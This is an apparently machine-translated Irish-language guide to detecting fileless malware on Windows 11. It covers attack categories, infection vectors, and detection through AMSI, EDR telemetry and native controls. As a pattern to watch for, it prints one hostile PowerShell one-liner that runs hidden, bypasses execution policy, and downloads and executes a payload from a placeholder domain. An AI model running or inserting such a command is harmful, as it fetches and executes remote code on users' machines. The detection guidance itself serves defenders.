Conas malware contúirteach gan chomhad a bhrath i Windows 11

¿Conas malware contúirteach gan chomhad a bhrath? Tá méadú suntasach tagtha ar ghníomhaíocht ionsaithe gan chomhad, agus chun rudaí a dhéanamh níos measa fós, Níl Windows 11 díolmhaitheSeachnaíonn an cur chuige seo an diosca agus braitheann sé ar chuimhne agus ar uirlisí córais dlisteanacha; sin an fáth go mbíonn deacrachtaí ag cláir frithvíreas bunaithe ar shínithe. Más bealach iontaofa atá uait chun é a bhrath, is é an freagra ná é a chomhcheangal. teileiméadracht, anailís iompraíochta, agus rialuithe Windows.

Sa chóras reatha, bíonn feachtais a dhéanann mí-úsáid de PowerShell, WMI, nó Mshta ag feidhmiú i gcomhar le teicnící níos sofaisticiúla amhail instealltaí cuimhne, buanseasmhacht "gan teagmháil" leis an diosca, agus fiú... mí-úsáidí firmwareIs é an rud is tábhachtaí ná tuiscint a fháil ar léarscáil na mbagairtí, ar na céimeanna ionsaithe, agus ar na comharthaí a fhágann siad fiú nuair a tharlaíonn gach rud laistigh de RAM.

Cad is malware gan chomhad ann agus cén fáth go bhfuil sé ina ábhar imní i Windows 11?

Nuair a labhraímid faoi bhagairtí "gan chomhad", táimid ag tagairt do chód mailíseach a Ní gá duit comhaid inrite nua a thaisceadh sa chóras comhad le go n-oibreoidh sé. De ghnáth, déantar é a instealladh i bpróisis atá ag rith agus a fhorghníomhú i RAM, ag brath ar ateangairí agus dénárthaí atá sínithe ag Microsoft (e.g., PowerShell, WMI, rundll32, mshtaLaghdaíonn sé seo do lorg coise agus ligeann sé duit innill nach bhfuil ag lorg ach comhaid amhrasacha a sheachaint.

Meastar gur cuid den feiniméan fiú doiciméid oifige nó PDFanna a bhaineann leas as leochaileachtaí chun orduithe a sheoladh, mar gheall ar gníomhú sa chuimhne gan dénárthaí úsáideacha a fhágáil le haghaidh anailíse. Mí-úsáid macraí agus DDE In Office, ós rud é go ritheann an cód i bpróisis dhlisteanacha cosúil le WinWord.

Comhcheanglaíonn ionsaitheoirí innealtóireacht shóisialta (fioscaireachta, naisc turscair) le gaistí teicniúla: cuireann cliceáil an úsáideora tús le slabhra ina n-íoslódálann script agus ina bhforghníomhaíonn sé an t-ualach deiridh sa chuimhne, gan rian a fhágáil ar an diosca. Tá réimse leathan cuspóirí i gceist, ó ghoid sonraí go cur i bhfeidhm ransomware, go gluaiseacht chliathánach chiúin.

Cineálacha de réir lorg coise sa chóras: ó 'íon' go hibridí

Chun coincheapa mearbhallacha a sheachaint, is fiú bagairtí a dheighilt de réir a méid idirghníomhaíochta leis an gcóras comhad. Soiléiríonn an catagóiriú seo cad a mhaireann, cá bhfuil an cód ina chónaí, agus cad iad na comharthaí a fhágann sé?.

Cineál I: gan aon ghníomhaíocht comhaid

Ní scríobhann malware atá go hiomlán gan chomhad aon rud chuig diosca. Sampla clasaiceach is ea leas a bhaint as leochaileacht líonra (cosúil leis an veicteoir EternalBlue a bhíodh ann) chun doras cúil a chur i bhfeidhm atá suite i gcuimhne an eithne (cásanna cosúil le DoublePulsar). Anseo, tarlaíonn gach rud in RAM agus níl aon déantáin sa chóras comhad.

Rogha eile is ea éilliú a dhéanamh ar an firmware comhpháirteanna: BIOS/UEFI, oiriúnaitheoirí líonra, forimeallaigh USB (teicnící de chineál BadUSB) nó fiú fochórais LAP. Leanann siad ar aghaidh trí atosú agus athshuiteáil, leis an deacracht bhreise go Is beag táirge a dhéanann iniúchadh ar fhirmchlárIs ionsaithe casta iad seo, nach bhfuil chomh minic, ach atá contúirteach mar gheall ar a n-urchóideacht agus a marthanacht.

Cineál II: Gníomhaíocht chartlannaithe indíreach

Anseo, ní "fhágann" an malware a inrite féin, ach úsáideann sé coimeádáin atá bainistithe ag an gcóras agus atá stóráilte mar chomhaid go bunúsach. Mar shampla, doirse cúil a chuireann... orduithe powershell sa stórlann WMI agus a fhorghníomhú a spreagadh le scagairí imeachtaí. Is féidir é a shuiteáil ón líne ordaithe gan comhaid dhénártha a scaoileadh, ach tá stórlann WMI ar dhiosca mar bhunachar sonraí dlisteanach, rud a fhágann go bhfuil sé deacair é a ghlanadh gan cur isteach ar an gcóras.

Ó thaobh praiticiúil de, meastar nach bhfuil aon chomhad iontu, toisc go bhfuil an coimeádán sin (WMI, Clárlann, srl.) Ní comhad inrite clasaiceach inbhraite é Agus ní rud simplí é a ghlanadh. An toradh: buanseasmhacht rúnda le beagán rian "traidisiúnta".

Cineál III: Éilíonn sé comhaid le feidhmiú

Coinníonn roinnt cásanna buanseasmhacht 'gan chomhad' Ar leibhéal loighciúil, teastaíonn spreagadh bunaithe ar chomhad uathu. Is é Kovter an sampla tipiciúil: cláraíonn sé briathar sliogáin le haghaidh síneadh randamach; nuair a osclaítear comhad leis an síneadh sin, seoltar script beag ag baint úsáide as mshta.exe, a athchruthaíonn an teaghrán mailíseach ón gClárlann.

Is é an cleas ná nach bhfuil ualach in-anailísithe sna comhaid "bait" seo le síntí randamacha, agus go bhfuil formhór an chóid suite sa clárú (coimeádán eile). Sin é an fáth a ndéantar iad a chatagóiriú mar gan chomhad ó thaobh tionchair de, cé go mbraitheann siad, go docht, ar aon cheann amháin nó níos mó de na déantáin diosca mar spreagadh.

Veicteoirí agus 'óstaigh' ionfhabhtaithe: cá dtéann sé isteach agus cá bhfolaíonn sé

Chun feabhas a chur ar bhrath, tá sé ríthábhachtach pointe iontrála agus óstach an ionfhabhtaithe a mhapáil. Cuidíonn an dearcadh seo le dearadh rialuithe sonracha Tabhair tús áite do theileiméadracht chuí.

exploits

• Bunaithe ar chomhaid (Cineál III): Is féidir le doiciméid, comhaid inrite, comhaid oidhreachta Flash/Java, nó comhaid LNK leas a bhaint as an mbrabhsálaí nó as an inneall a phróiseálann iad chun cód sliogáin a luchtú isteach sa chuimhne. Is comhad é an chéad veicteoir, ach taistealaíonn an t-ualach chuig an RAM.
• Bunaithe ar líonra (Cineál I): Pacáiste a shaothraíonn leochaileacht (e.g., i SMB) a fhorghníomhú sa talamh úsáideora nó sa chroílár. Rinne WannaCry an cur chuige seo a chur chun cinn. Ualach cuimhne díreach gan comhad nua.

crua-earraí

• feistí (Cineál I): Is féidir firmware diosca nó cárta líonra a athrú agus cód a thabhairt isteach. Deacair é a iniúchadh agus leanann sé ar aghaidh lasmuigh den chóras oibriúcháin.
• Fochórais LAP agus bainistíochta (Cineál I): Tá teicneolaíochtaí ar nós ME/AMT Intel tar éis bealaí a léiriú chun Líonrú agus forghníomhú lasmuigh den chóras oibriúcháinDéanann sé ionsaí ar leibhéal an-íseal, le hardacmhainneacht ann.
• USB (Cineál I): Le BadUSB is féidir leat tiomántán USB a athchlárú chun méarchlár nó NIC a phearsantú agus orduithe a sheoladh nó trácht a atreorú.
• BIOS / UEFI (Cineál I): athchlárú bogearraí mailíseacha (cásanna cosúil le Mebromi) a ritheann sula dtosaíonn Windows.
• Hypervisor (Cineál I): Mion-hipirfheisteoir a chur i bhfeidhm faoin gcóras oibriúcháin chun a láithreacht a cheilt. Is annamh a tharlaíonn sé, ach feictear é cheana féin i bhfoirm fréamh-threalamh hipirfheisteoirí.

Forghníomhú agus instealladh

• Bunaithe ar chomhaid (Cineál III): EXE/DLL/LNK nó tascanna sceidealaithe a sheolann instealltaí i bpróisis dhlisteanacha.
• Macraí (Cineál III): Is féidir le VBA in Office ualaí a dhíchódú agus a fhorghníomhú, lena n-áirítear ransomware iomlán, le toiliú an úsáideora trí mheabhlaireacht.
• Scripteanna (Cineál II): PowerShell, VBScript nó JScript ó chomhad, líne ordaithe, seirbhísí, Clárú nó WMIIs féidir leis an ionsaitheoir an script a chlóscríobh i seisiún iargúlta gan teagmháil a dhéanamh leis an diosca.
• Taifead tosaithe (MBR/Tosaithe) (Cineál II): Scríobhann teaghlaigh cosúil le Petya an earnáil tosaithe chun smacht a ghlacadh ag an am tosaithe. Tá sé lasmuigh den chóras comhad, ach tá sé inrochtana ag an OS agus réitigh nua-aimseartha ar féidir leo é a athchóiriú.

Conas a oibríonn ionsaithe gan chomhad: céimeanna agus comharthaí

Cé nach bhfágann siad comhaid inrite, leanann na feachtais loighic chéimnithe. Trí thuiscint a fháil orthu is féidir monatóireacht a dhéanamh orthu. imeachtaí agus caidrimh idir phróisis a fhágann marc.

• Rochtain tosaighIonsaithe fioscaireachta ag baint úsáide as naisc nó ceangaltáin, suíomhanna gréasáin atá i mbaol, nó dintiúir goidte. Tosaíonn go leor slabhraí le doiciméad Office a spreagann ordú PowerShell.
• Marthanacht: doirse cúil trí WMI (scagairí agus síntiúis), Eochracha forghníomhaithe clárlainne nó tascanna sceidealaithe a athsheolann scripteanna gan comhad mailíseach nua.
• Eis-scagadhNuair a bhailítear an fhaisnéis, seoltar amach as an líonra í ag baint úsáide as próisis iontaofa (brabhsálaithe, PowerShell, bitsadmin) chun trácht a mheascadh.

Tá an patrún seo thar a bheith seafóideach mar gheall ar an táscairí ionsaithe Folaíonn siad sa ghnáthrud: argóintí líne ordaithe, slabhrú próiseas, naisc amach neamhghnácha, nó rochtain ar APIanna insteallta.

Teicnící coitianta: ó chuimhne go taifeadadh

Braitheann na haisteoirí ar raon modhanna a uasmhéadaíonn an cheilt. Tá sé cabhrach na cinn is coitianta a bheith ar eolas agat chun braiteadh éifeachtach a ghníomhachtú.

• Cónaitheoir i gcuimhneAg lódáil ualaí isteach i spás próisis iontaofa atá ag fanacht le gníomhachtú. fréamhacha agus crúcaí Sa chroílár, ardaíonn siad an leibhéal ceilte.
• Buanseasmhacht sa ChlárlannSábháil blobanna criptithe in eochracha agus athhiodráitigh iad ó lainseálaí dlisteanach (mshta, rundll32, wscript). Is féidir leis an suiteálaí neamhbhuan féinscrios a dhéanamh chun a lorg coise a íoslaghdú.
• Fioscaireacht dintiúirAg baint úsáide as ainmneacha úsáideora agus pasfhocail goidte, cuireann an t-ionsaitheoir sliogáin agus plandaí iargúlta i gcrích rochtain chiúin sa Chlárlann nó sa WMI.
• Ransomware 'Gan Chomhad'Déantar criptiú agus cumarsáid C2 a stiúradh ón RAM, rud a laghdaíonn deiseanna braite go dtí go mbeidh an damáiste le feiceáil.
• Trealamh oibriúcháin: slabhraí uathoibrithe a bhraith leochaileachtaí agus a imscarann ​​ualaí cuimhne amháin tar éis don úsáideoir cliceáil.
• Doiciméid le códmacraí agus meicníochtaí cosúil le DDE a spreagann orduithe gan comhaid inrite a shábháil ar dhiosca.

Tá buaicphointí suntasacha léirithe cheana féin i staidéir tionscail: i dtréimhse amháin de 2018, méadú os cionn 90% in ionsaithe slabhra PowerShell agus bunaithe ar scripteanna, comhartha gur fearr an veicteoir mar gheall ar a éifeachtacht.

An dúshlán do chuideachtaí agus do sholáthraithe: cén fáth nach leor bac a chur air

Bheadh ​​​​sé mealltach PowerShell a dhíchumasú nó macraí a thoirmeasc go deo, ach Bhrisfeá an oibríochtIs colún den riarachán nua-aimseartha é PowerShell agus tá Office riachtanach i gcúrsaí gnó; is minic nach mbíonn sé indéanta é a bhac go dall.

Ina theannta sin, tá bealaí ann chun rialuithe bunúsacha a sheachaint: PowerShell a rith trí DLLanna agus rundll32, scripteanna a phacáistiú in EXEanna, Tabhair leat do chóip féin de PowerShell nó fiú scripteanna a cheilt in íomhánna agus iad a bhaint amach sa chuimhne. Dá bhrí sin, ní féidir an chosaint a bhunú go hiomlán ar shéanadh go bhfuil uirlisí ann.

Botún coitianta eile is ea an cinneadh ar fad a tharmligean chuig an scamall: má bhíonn ar an ngníomhaire fanacht le freagra ón bhfreastalaí, Caillfidh tú cosc ​​fíor-amaIs féidir sonraí teileiméadrachta a uaslódáil chun an fhaisnéis a shaibhriú, ach an Ní mór maolú a dhéanamh ag an gcríochphointe.

Conas malware gan chomhad a bhrath i Windows 11: teileiméadracht agus iompar

Is í an straitéis bhuaiteach monatóireacht a dhéanamh ar phróisis agus ar chuimhneNí comhaid. Bíonn iompraíochtaí mailíseacha níos cobhsaí ná na foirmeacha a ghlacann comhad, rud a fhágann go bhfuil siad oiriúnach d'innill choisctheacha.

• AMSI (Comhéadan Scanadh Frith-Mhailíseacha)Gabhann sé scripteanna PowerShell, VBScript, nó JScript fiú nuair a thógtar iad go dinimiciúil sa chuimhne. Den scoth chun teaghráin doiléire a ghabháil roimh fhorghníomhú.
• Monatóireacht phróisistús/críoch, PID, tuismitheoirí agus páistí, bealaí, línte ordaithe agus haiseanna, móide crainn fhorghníomhaithe chun an scéal iomlán a thuiscint.
• Anailís chuimhne: braiteadh instealltaí, ualaí frithchaiteacha nó PE gan teagmháil a dhéanamh leis an diosca, agus athbhreithniú ar réigiúin inrite neamhghnácha.
• Cosaint earnála tosaithe: rialú agus athchóiriú an MBR/EFI i gcás cur isteach.

I n-éiceachóras Microsoft, comhcheanglaíonn Defender for Endpoint AMSI, monatóireacht iompairÚsáidtear scanadh cuimhne agus foghlaim meaisín scamallbhunaithe chun braiteadh a scála i gcoinne malairtí nua nó doiléire. Úsáideann díoltóirí eile cur chuige comhchosúla le hinnill chónaitheacha eithne.

Sampla réalaíoch de chomhghaol: ó dhoiciméad go PowerShell

Samhlaigh slabhra ina n-íoslódálann Outlook ceangaltán, ina n-osclaíonn Word an doiciméad, ina gcumasaítear ábhar gníomhach, agus ina seoltar PowerShell le paraiméadair amhrasacha. Taispeánfadh teileamaitríocht chuí an Líne ordaithe (e.g., Seachbhóthar ExecutionPolicy, fuinneog i bhfolach), ag ceangal le fearann ​​​​neamhiontaofa agus ag cruthú próiseas linbh a shuiteálann é féin in AppData.

Tá gníomhaire a bhfuil comhthéacs áitiúil aige in ann stad agus aisiompú gníomhaíocht mailíseach gan idirghabháil láimhe, chomh maith le fógra a thabhairt don SIEM nó trí ríomhphost/SMS. Cuireann roinnt táirgí ciseal leithdháilte cúise fréimhe (samhlacha de chineál StoryLine), rud nach dtugann aird ar an bpróiseas infheicthe (Outlook/Word), ach ar an snáithe mailíseach iomlán agus a bhunús chun an córas a ghlanadh go cuimsitheach.

D’fhéadfadh patrún ordaithe tipiciúil le faire amach dó a bheith mar seo: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Ní hé an loighic an teaghrán cruinn, ach an tsraith comharthaí: seachbhóthar beartais, fuinneog i bhfolach, íoslódáil shoiléir, agus forghníomhú sa chuimhne.

AMSI, píblíne agus ról gach aisteoir: ón gcríochphointe go dtí an SOC

Thar ghabháil scripte, eagraíonn ailtireacht láidir céimeanna a éascaíonn imscrúdú agus freagairt. Dá mhéad fianaise atá ann sula ndéantar an t-ualach a fhorghníomhú, is amhlaidh is fearr., is fearr.

• Idircheapadh scripteSeachadann AMSI an t-ábhar (fiú má ghintear é ar an toirt) le haghaidh anailíse statach agus dinimiciúil i bpíblíne malware.
• Imeachtaí próisisBailítear PIDanna, dénárthaí, haiseanna, bealaí, agus sonraí eile. argóintí, ag bunú na gcrann próisis a threoraigh chuig an ualach deiridh.
• Brath agus tuairisciúTaispeántar na braithintí ar chonsól an táirge agus cuirtear ar aghaidh chuig ardáin líonra (NDR) iad le haghaidh léirshamhlú feachtasaíochta.
• Ráthaíochtaí úsáideoraFiú má chuirtear script isteach sa chuimhne, an creatlach Gabhann AMSI é i leaganacha comhoiriúnacha de Windows.
• Cumais riarthóracumraíocht beartais chun iniúchadh scripte a chumasú, blocáil bunaithe ar iompar agus tuarascálacha a chruthú ón gconsól.
• Obair SOCeastóscadh déantán (UUID VM, leagan OS, cineál scripte, próiseas tionscnóra agus a thuismitheoir, haiseanna agus línte ordaithe) chun an stair a athchruthú agus rialacha ardaitheora todhchaí.

Nuair a cheadaíonn an t-ardán onnmhairiú an maolán cuimhne I dteannta an fhorghníomhaithe, is féidir le taighdeoirí braith nua a ghiniúint agus an chosaint i gcoinne malairtí comhchosúla a shaibhriú.

Bearta praiticiúla i Windows 11: cosc ​​agus fiach

Chomh maith le EDR le cigireacht chuimhne agus AMSI, ligeann Windows 11 duit spásanna ionsaithe a dhúnadh agus infheictheacht a fheabhsú le rialuithe dúchasacha.

• Clárú agus srianta i PowerShellCumasaíonn sé Logáil Bloc Scripte agus Logáil Modúl, cuireann sé modhanna srianta i bhfeidhm nuair is féidir, agus rialaíonn sé úsáid Seachbhóthar/Folaithe.
• Rialacha Laghdú Dromchla Ionsaithe (ASR)bac ar lainseálacha scripteanna ag próisis Office agus Mí-úsáid WMI/PSExec nuair nach bhfuil gá leis.
• Polasaithe macra na hOifigedíchumasaíonn sé de réir réamhshocraithe síniú macra inmheánach agus liostaí muiníne dochta; déanann sé monatóireacht ar shreabhadh DDE oidhreachta.
• Iniúchadh agus Clárlann WMIDéanann monatóireacht ar shíntiúis imeachtaí agus eochracha forghníomhaithe uathoibríocha (Rith, RunOnce, Winlogon), chomh maith le cruthú tascanna sceidealta.
• Cosaint tosaitheGníomhaíonn sé Tosaithe Slán, seiceálann sé sláine MBR/EFI agus bailíochtú nach bhfuil aon mhodhnuithe ann ag an tosaithe.
• Paisteáil agus cruaiteáilDúnann sé leochaileachtaí inúsáidte i mbrabhsálaithe, i gcomhpháirteanna Office, agus i seirbhísí líonra.
• feasachta: traenálann sé úsáideoirí agus foirne teicniúla i bhfioscaireacht agus i gcomharthaí báisithe rúnda.

Chun fiaigh a dhéanamh, dírigh ar cheisteanna faoi: próisis a chruthú ag Office i dtreo PowerShell/MSHTA, argóintí le íoslódáilteaghrán/íoslódáilcomhadScripteanna le doiléiriú soiléir, instealltaí machnamhacha, agus líonraí amach chuig TLDanna amhrasacha. Déan crostagairt idir na comharthaí seo agus clú agus minicíocht chun torann a laghdú.

Cad is féidir le gach inneall a bhrath inniu?

Comhcheanglaíonn réitigh fiontraíochta Microsoft AMSI, anailísíocht iompraíochta, scrúdú a dhéanamh ar an gcuimhne agus cosaint earnála tosaithe, chomh maith le samhlacha ML scamallbhunaithe chun scála a dhéanamh i gcoinne bagairtí atá ag teacht chun cinn. Cuireann díoltóirí eile monatóireacht ar leibhéal an eithne i bhfeidhm chun idirdhealú a dhéanamh idir bogearraí mailíseacha agus neamhurchóideacha le hathruithe a aisiompú go huathoibríoch.

Cur chuige bunaithe ar scéalta forghníomhaithe Ligeann sé duit an chúis fhréamh a aithint (mar shampla, ceangaltán Outlook a spreagann slabhra) agus an crann iomlán a mhaolú: scripteanna, eochracha, tascanna, agus comhaid dhénártha idirmheánacha, agus gan dul i bhfostú ar an siomptóm infheicthe.

Botúin choitianta agus conas iad a sheachaint

Ní hamháin go bhfuil sé neamhphraiticiúil PowerShell a bhlocáil gan plean bainistíochta malartach, ach tá roinnt fadhbanna ann freisin. bealaí chun é a ghairm go hindíreachBaineann an rud céanna le macraí: bainistíonn tú iad le beartais agus sínithe, nó beidh an gnó thíos leis. Is fearr díriú ar theileiméadracht agus rialacha iompraíochta.

Botún coitianta eile is ea a chreidiúint go réitíonn feidhmchláir liosta bán gach rud: braitheann teicneolaíocht gan chomhad go díreach ar seo. apps iontaofaBa chóir don rialú breathnú ar a ndéanann siad agus ar an gcaoi a mbaineann siad leis, ní hamháin an gceadaítear dóibh.

Leis an méid thuas go léir, ní bhíonn malware gan chomhad ina "taibhse" a thuilleadh nuair a dhéantar monatóireacht ar a bhfuil tábhachtach i ndáiríre: iompar, cuimhne agus bunús de gach forghníomhú. Trí AMSI, teileiméadracht phróisis shaibhir, rialuithe dúchasacha Windows 11, agus ciseal EDR le hanailís iompraíochta a chomhcheangal, tugtar an buntáiste duit. Cuir beartais réadúla le haghaidh macraí agus PowerShell, iniúchadh WMI/Clárlainne, agus fiach a thugann tús áite do línte ordaithe agus do chrainn phróisis leis an gcothromóid, agus beidh cosaint agat a ghearrann na slabhraí seo sula ndéanann siad fuaim.